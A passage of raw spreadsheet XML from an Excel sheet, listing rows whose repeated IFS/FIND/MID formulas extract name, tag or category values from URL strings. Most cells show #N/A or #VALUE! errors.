      <c r="E1375" t="e" cm="1">
        <f t="array" ref="E1375">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1375)), MID($A1375, FIND("name=",$A1375) + 5, LEN($A1375) - FIND("name=",$A1375)),
    ISNUMBER(FIND("tag/",$A1375)), MID($A1375, FIND("tag/",$A1375) + 4, LEN($A1375) - FIND("tag/",$A1375)),
    ISNUMBER(FIND("category",$A1375)), MID($A1375, FIND("category",$A1375) + 9, LEN($A1375) - FIND("category",$A1375)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1375" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1376" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1376" t="s">
        <v>2403</v>
      </c>
      <c r="B1376" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1376" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1376" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1376" t="e" cm="1">
        <f t="array" ref="E1376">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1376)), MID($A1376, FIND("name=",$A1376) + 5, LEN($A1376) - FIND("name=",$A1376)),
    ISNUMBER(FIND("tag/",$A1376)), MID($A1376, FIND("tag/",$A1376) + 4, LEN($A1376) - FIND("tag/",$A1376)),
    ISNUMBER(FIND("category",$A1376)), MID($A1376, FIND("category",$A1376) + 9, LEN($A1376) - FIND("category",$A1376)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1376" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1377" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1377" t="s">
        <v>2377</v>
      </c>
      <c r="B1377" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1377" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1377" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1377" t="e" cm="1">
        <f t="array" ref="E1377">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1377)), MID($A1377, FIND("name=",$A1377) + 5, LEN($A1377) - FIND("name=",$A1377)),
    ISNUMBER(FIND("tag/",$A1377)), MID($A1377, FIND("tag/",$A1377) + 4, LEN($A1377) - FIND("tag/",$A1377)),
    ISNUMBER(FIND("category",$A1377)), MID($A1377, FIND("category",$A1377) + 9, LEN($A1377) - FIND("category",$A1377)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1377" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1378" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1378" t="s">
        <v>2377</v>
      </c>
      <c r="B1378" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1378" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1378" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1378" t="e" cm="1">
        <f t="array" ref="E1378">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1378)), MID($A1378, FIND("name=",$A1378) + 5, LEN($A1378) - FIND("name=",$A1378)),
    ISNUMBER(FIND("tag/",$A1378)), MID($A1378, FIND("tag/",$A1378) + 4, LEN($A1378) - FIND("tag/",$A1378)),
    ISNUMBER(FIND("category",$A1378)), MID($A1378, FIND("category",$A1378) + 9, LEN($A1378) - FIND("category",$A1378)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1378" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1379" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1379" t="s">
        <v>2403</v>
      </c>
      <c r="B1379" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1379" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1379" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1379" t="e" cm="1">
        <f t="array" ref="E1379">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1379)), MID($A1379, FIND("name=",$A1379) + 5, LEN($A1379) - FIND("name=",$A1379)),
    ISNUMBER(FIND("tag/",$A1379)), MID($A1379, FIND("tag/",$A1379) + 4, LEN($A1379) - FIND("tag/",$A1379)),
    ISNUMBER(FIND("category",$A1379)), MID($A1379, FIND("category",$A1379) + 9, LEN($A1379) - FIND("category",$A1379)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1379" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1380" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1380" t="s">
        <v>2346</v>
      </c>
      <c r="B1380" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1380" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1380" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1380" t="e" cm="1">
        <f t="array" ref="E1380">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1380)), MID($A1380, FIND("name=",$A1380) + 5, LEN($A1380) - FIND("name=",$A1380)),
    ISNUMBER(FIND("tag/",$A1380)), MID($A1380, FIND("tag/",$A1380) + 4, LEN($A1380) - FIND("tag/",$A1380)),
    ISNUMBER(FIND("category",$A1380)), MID($A1380, FIND("category",$A1380) + 9, LEN($A1380) - FIND("category",$A1380)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1380" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1381" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1381" t="s">
        <v>2377</v>
      </c>
      <c r="B1381" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1381" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1381" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1381" t="e" cm="1">
        <f t="array" ref="E1381">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1381)), MID($A1381, FIND("name=",$A1381) + 5, LEN($A1381) - FIND("name=",$A1381)),
    ISNUMBER(FIND("tag/",$A1381)), MID($A1381, FIND("tag/",$A1381) + 4, LEN($A1381) - FIND("tag/",$A1381)),
    ISNUMBER(FIND("category",$A1381)), MID($A1381, FIND("category",$A1381) + 9, LEN($A1381) - FIND("category",$A1381)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1381" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1382" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1382" t="s">
        <v>2391</v>
      </c>
      <c r="B1382" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1382" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1382" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1382" t="e" cm="1">
        <f t="array" ref="E1382">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1382)), MID($A1382, FIND("name=",$A1382) + 5, LEN($A1382) - FIND("name=",$A1382)),
    ISNUMBER(FIND("tag/",$A1382)), MID($A1382, FIND("tag/",$A1382) + 4, LEN($A1382) - FIND("tag/",$A1382)),
    ISNUMBER(FIND("category",$A1382)), MID($A1382, FIND("category",$A1382) + 9, LEN($A1382) - FIND("category",$A1382)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1382" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1383" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1383" t="s">
        <v>2248</v>
      </c>
      <c r="B1383" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1383" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1383" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1383" t="e" cm="1">
        <f t="array" ref="E1383">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1383)), MID($A1383, FIND("name=",$A1383) + 5, LEN($A1383) - FIND("name=",$A1383)),
    ISNUMBER(FIND("tag/",$A1383)), MID($A1383, FIND("tag/",$A1383) + 4, LEN($A1383) - FIND("tag/",$A1383)),
    ISNUMBER(FIND("category",$A1383)), MID($A1383, FIND("category",$A1383) + 9, LEN($A1383) - FIND("category",$A1383)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1383" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1384" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1384" t="s">
        <v>2377</v>
      </c>
      <c r="B1384" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1384" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1384" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1384" t="e" cm="1">
        <f t="array" ref="E1384">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1384)), MID($A1384, FIND("name=",$A1384) + 5, LEN($A1384) - FIND("name=",$A1384)),
    ISNUMBER(FIND("tag/",$A1384)), MID($A1384, FIND("tag/",$A1384) + 4, LEN($A1384) - FIND("tag/",$A1384)),
    ISNUMBER(FIND("category",$A1384)), MID($A1384, FIND("category",$A1384) + 9, LEN($A1384) - FIND("category",$A1384)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1384" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1385" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1385" t="s">
        <v>2403</v>
      </c>
      <c r="B1385" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1385" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1385" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1385" t="e" cm="1">
        <f t="array" ref="E1385">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1385)), MID($A1385, FIND("name=",$A1385) + 5, LEN($A1385) - FIND("name=",$A1385)),
    ISNUMBER(FIND("tag/",$A1385)), MID($A1385, FIND("tag/",$A1385) + 4, LEN($A1385) - FIND("tag/",$A1385)),
    ISNUMBER(FIND("category",$A1385)), MID($A1385, FIND("category",$A1385) + 9, LEN($A1385) - FIND("category",$A1385)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1385" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1386" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1386" t="s">
        <v>2346</v>
      </c>
      <c r="B1386" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1386" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1386" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1386" t="e" cm="1">
        <f t="array" ref="E1386">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1386)), MID($A1386, FIND("name=",$A1386) + 5, LEN($A1386) - FIND("name=",$A1386)),
    ISNUMBER(FIND("tag/",$A1386)), MID($A1386, FIND("tag/",$A1386) + 4, LEN($A1386) - FIND("tag/",$A1386)),
    ISNUMBER(FIND("category",$A1386)), MID($A1386, FIND("category",$A1386) + 9, LEN($A1386) - FIND("category",$A1386)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1386" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1387" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1387" t="s">
        <v>2377</v>
      </c>
      <c r="B1387" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1387" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1387" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1387" t="e" cm="1">
        <f t="array" ref="E1387">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1387)), MID($A1387, FIND("name=",$A1387) + 5, LEN($A1387) - FIND("name=",$A1387)),
    ISNUMBER(FIND("tag/",$A1387)), MID($A1387, FIND("tag/",$A1387) + 4, LEN($A1387) - FIND("tag/",$A1387)),
    ISNUMBER(FIND("category",$A1387)), MID($A1387, FIND("category",$A1387) + 9, LEN($A1387) - FIND("category",$A1387)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1387" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1388" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1388" t="s">
        <v>2403</v>
      </c>
      <c r="B1388" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1388" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1388" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1388" t="e" cm="1">
        <f t="array" ref="E1388">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1388)), MID($A1388, FIND("name=",$A1388) + 5, LEN($A1388) - FIND("name=",$A1388)),
    ISNUMBER(FIND("tag/",$A1388)), MID($A1388, FIND("tag/",$A1388) + 4, LEN($A1388) - FIND("tag/",$A1388)),
    ISNUMBER(FIND("category",$A1388)), MID($A1388, FIND("category",$A1388) + 9, LEN($A1388) - FIND("category",$A1388)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1388" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1389" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1389" t="s">
        <v>2346</v>
      </c>
      <c r="B1389" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1389" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1389" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1389" t="e" cm="1">
        <f t="array" ref="E1389">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1389)), MID($A1389, FIND("name=",$A1389) + 5, LEN($A1389) - FIND("name=",$A1389)),
    ISNUMBER(FIND("tag/",$A1389)), MID($A1389, FIND("tag/",$A1389) + 4, LEN($A1389) - FIND("tag/",$A1389)),
    ISNUMBER(FIND("category",$A1389)), MID($A1389, FIND("category",$A1389) + 9, LEN($A1389) - FIND("category",$A1389)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1389" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1390" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1390" t="s">
        <v>2391</v>
      </c>
      <c r="B1390" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1390" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1390" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1390" t="e" cm="1">
        <f t="array" ref="E1390">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1390)), MID($A1390, FIND("name=",$A1390) + 5, LEN($A1390) - FIND("name=",$A1390)),
    ISNUMBER(FIND("tag/",$A1390)), MID($A1390, FIND("tag/",$A1390) + 4, LEN($A1390) - FIND("tag/",$A1390)),
    ISNUMBER(FIND("category",$A1390)), MID($A1390, FIND("category",$A1390) + 9, LEN($A1390) - FIND("category",$A1390)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1390" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1391" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1391" t="s">
        <v>2296</v>
      </c>
      <c r="B1391" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1391" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1391" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1391" t="e" cm="1">
        <f t="array" ref="E1391">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1391)), MID($A1391, FIND("name=",$A1391) + 5, LEN($A1391) - FIND("name=",$A1391)),
    ISNUMBER(FIND("tag/",$A1391)), MID($A1391, FIND("tag/",$A1391) + 4, LEN($A1391) - FIND("tag/",$A1391)),
    ISNUMBER(FIND("category",$A1391)), MID($A1391, FIND("category",$A1391) + 9, LEN($A1391) - FIND("category",$A1391)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1391" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1392" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1392" t="s">
        <v>2248</v>
      </c>
      <c r="B1392" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1392" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1392" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1392" t="e" cm="1">
        <f t="array" ref="E1392">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1392)), MID($A1392, FIND("name=",$A1392) + 5, LEN($A1392) - FIND("name=",$A1392)),
    ISNUMBER(FIND("tag/",$A1392)), MID($A1392, FIND("tag/",$A1392) + 4, LEN($A1392) - FIND("tag/",$A1392)),
    ISNUMBER(FIND("category",$A1392)), MID($A1392, FIND("category",$A1392) + 9, LEN($A1392) - FIND("category",$A1392)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1392" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1393" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1393" t="s">
        <v>2561</v>
      </c>
      <c r="B1393" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1393" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1393" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1393" t="e" cm="1">
        <f t="array" ref="E1393">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1393)), MID($A1393, FIND("name=",$A1393) + 5, LEN($A1393) - FIND("name=",$A1393)),
    ISNUMBER(FIND("tag/",$A1393)), MID($A1393, FIND("tag/",$A1393) + 4, LEN($A1393) - FIND("tag/",$A1393)),
    ISNUMBER(FIND("category",$A1393)), MID($A1393, FIND("category",$A1393) + 9, LEN($A1393) - FIND("category",$A1393)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1393" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1394" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1394" t="s">
        <v>2260</v>
      </c>
      <c r="B1394" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1394" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1394" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1394" t="e" cm="1">
        <f t="array" ref="E1394">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1394)), MID($A1394, FIND("name=",$A1394) + 5, LEN($A1394) - FIND("name=",$A1394)),
    ISNUMBER(FIND("tag/",$A1394)), MID($A1394, FIND("tag/",$A1394) + 4, LEN($A1394) - FIND("tag/",$A1394)),
    ISNUMBER(FIND("category",$A1394)), MID($A1394, FIND("category",$A1394) + 9, LEN($A1394) - FIND("category",$A1394)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1394" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1395" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1395" t="s">
        <v>2262</v>
      </c>
      <c r="B1395" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1395" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1395" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1395" t="e" cm="1">
        <f t="array" ref="E1395">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1395)), MID($A1395, FIND("name=",$A1395) + 5, LEN($A1395) - FIND("name=",$A1395)),
    ISNUMBER(FIND("tag/",$A1395)), MID($A1395, FIND("tag/",$A1395) + 4, LEN($A1395) - FIND("tag/",$A1395)),
    ISNUMBER(FIND("category",$A1395)), MID($A1395, FIND("category",$A1395) + 9, LEN($A1395) - FIND("category",$A1395)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1395" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1396" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1396" t="s">
        <v>2562</v>
      </c>
      <c r="B1396" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1396" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1396" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1396" t="e" cm="1">
        <f t="array" ref="E1396">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1396)), MID($A1396, FIND("name=",$A1396) + 5, LEN($A1396) - FIND("name=",$A1396)),
    ISNUMBER(FIND("tag/",$A1396)), MID($A1396, FIND("tag/",$A1396) + 4, LEN($A1396) - FIND("tag/",$A1396)),
    ISNUMBER(FIND("category",$A1396)), MID($A1396, FIND("category",$A1396) + 9, LEN($A1396) - FIND("category",$A1396)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1396" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1397" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1397" t="s">
        <v>2260</v>
      </c>
      <c r="B1397" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1397" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1397" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1397" t="e" cm="1">
        <f t="array" ref="E1397">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1397)), MID($A1397, FIND("name=",$A1397) + 5, LEN($A1397) - FIND("name=",$A1397)),
    ISNUMBER(FIND("tag/",$A1397)), MID($A1397, FIND("tag/",$A1397) + 4, LEN($A1397) - FIND("tag/",$A1397)),
    ISNUMBER(FIND("category",$A1397)), MID($A1397, FIND("category",$A1397) + 9, LEN($A1397) - FIND("category",$A1397)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1397" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1398" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1398" t="s">
        <v>2264</v>
      </c>
      <c r="B1398" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1398" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1398" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1398" t="e" cm="1">
        <f t="array" ref="E1398">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1398)), MID($A1398, FIND("name=",$A1398) + 5, LEN($A1398) - FIND("name=",$A1398)),
    ISNUMBER(FIND("tag/",$A1398)), MID($A1398, FIND("tag/",$A1398) + 4, LEN($A1398) - FIND("tag/",$A1398)),
    ISNUMBER(FIND("category",$A1398)), MID($A1398, FIND("category",$A1398) + 9, LEN($A1398) - FIND("category",$A1398)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1398" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1399" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1399" t="s">
        <v>2262</v>
      </c>
      <c r="B1399" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1399" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1399" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1399" t="e" cm="1">
        <f t="array" ref="E1399">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1399)), MID($A1399, FIND("name=",$A1399) + 5, LEN($A1399) - FIND("name=",$A1399)),
    ISNUMBER(FIND("tag/",$A1399)), MID($A1399, FIND("tag/",$A1399) + 4, LEN($A1399) - FIND("tag/",$A1399)),
    ISNUMBER(FIND("category",$A1399)), MID($A1399, FIND("category",$A1399) + 9, LEN($A1399) - FIND("category",$A1399)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1399" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1400" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1400" t="s">
        <v>2265</v>
      </c>
      <c r="B1400" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1400" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1400" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1400" t="e" cm="1">
        <f t="array" ref="E1400">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1400)), MID($A1400, FIND("name=",$A1400) + 5, LEN($A1400) - FIND("name=",$A1400)),
    ISNUMBER(FIND("tag/",$A1400)), MID($A1400, FIND("tag/",$A1400) + 4, LEN($A1400) - FIND("tag/",$A1400)),
    ISNUMBER(FIND("category",$A1400)), MID($A1400, FIND("category",$A1400) + 9, LEN($A1400) - FIND("category",$A1400)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1400" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1401" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1401" t="s">
        <v>2563</v>
      </c>
      <c r="B1401" t="str">
        <f t="shared" si="64"/>
        <v>Shivaleeka%20Oberoi&amp;date=2023-11-15</v>
      </c>
      <c r="C1401" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1401" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1401" t="str" cm="1">
        <f t="array" ref="E1401">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1401)), MID($A1401, FIND("name=",$A1401) + 5, LEN($A1401) - FIND("name=",$A1401)),
    ISNUMBER(FIND("tag/",$A1401)), MID($A1401, FIND("tag/",$A1401) + 4, LEN($A1401) - FIND("tag/",$A1401)),
    ISNUMBER(FIND("category",$A1401)), MID($A1401, FIND("category",$A1401) + 9, LEN($A1401) - FIND("category",$A1401)))</f>
        <v>Shivaleeka%20Oberoi&amp;date=2023-11-15</v>
      </c>
      <c r="F1401" t="s">
        <v>3367</v>
      </c>
    </row>
    <row r="1402" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1402" t="s">
        <v>2248</v>
      </c>
      <c r="B1402" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1402" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1402" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1402" t="e" cm="1">
        <f t="array" ref="E1402">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1402)), MID($A1402, FIND("name=",$A1402) + 5, LEN($A1402) - FIND("name=",$A1402)),
    ISNUMBER(FIND("tag/",$A1402)), MID($A1402, FIND("tag/",$A1402) + 4, LEN($A1402) - FIND("tag/",$A1402)),
    ISNUMBER(FIND("category",$A1402)), MID($A1402, FIND("category",$A1402) + 9, LEN($A1402) - FIND("category",$A1402)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1402" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1403" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1403" t="s">
        <v>2248</v>
      </c>
      <c r="B1403" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1403" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1403" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1403" t="e" cm="1">
        <f t="array" ref="E1403">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1403)), MID($A1403, FIND("name=",$A1403) + 5, LEN($A1403) - FIND("name=",$A1403)),
    ISNUMBER(FIND("tag/",$A1403)), MID($A1403, FIND("tag/",$A1403) + 4, LEN($A1403) - FIND("tag/",$A1403)),
    ISNUMBER(FIND("category",$A1403)), MID($A1403, FIND("category",$A1403) + 9, LEN($A1403) - FIND("category",$A1403)))</f>
        <v>#N/A</v>
      </c>
      <c r="F1403" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="1404" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A1404" t="s">
        <v>2368</v>
      </c>
      <c r="B1404" t="e">
        <f t="shared" si="64"/>
        <v>#VALUE!</v>
      </c>
      <c r="C1404" t="e">
        <f t="shared" si="65"/>
        <v>#VALUE!</v>
      </c>
      <c r="D1404" t="e">
        <f t="shared" si="66"/>
        <v>#VALUE!</v>
      </c>
      <c r="E1404" t="e" cm="1">
        <f t="array" ref="E1404">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A1404)), MID($A1404, FIND("name=",$A1404) + 5, LEN($A1404) - FIND("name=",$A1404)),
    ISNUMBER(FIND("tag/",$A1404)), MID($A1404, FIND("tag/",$A1404) + 4, LEN($A1404) - FIND("tag/",$A1404)),
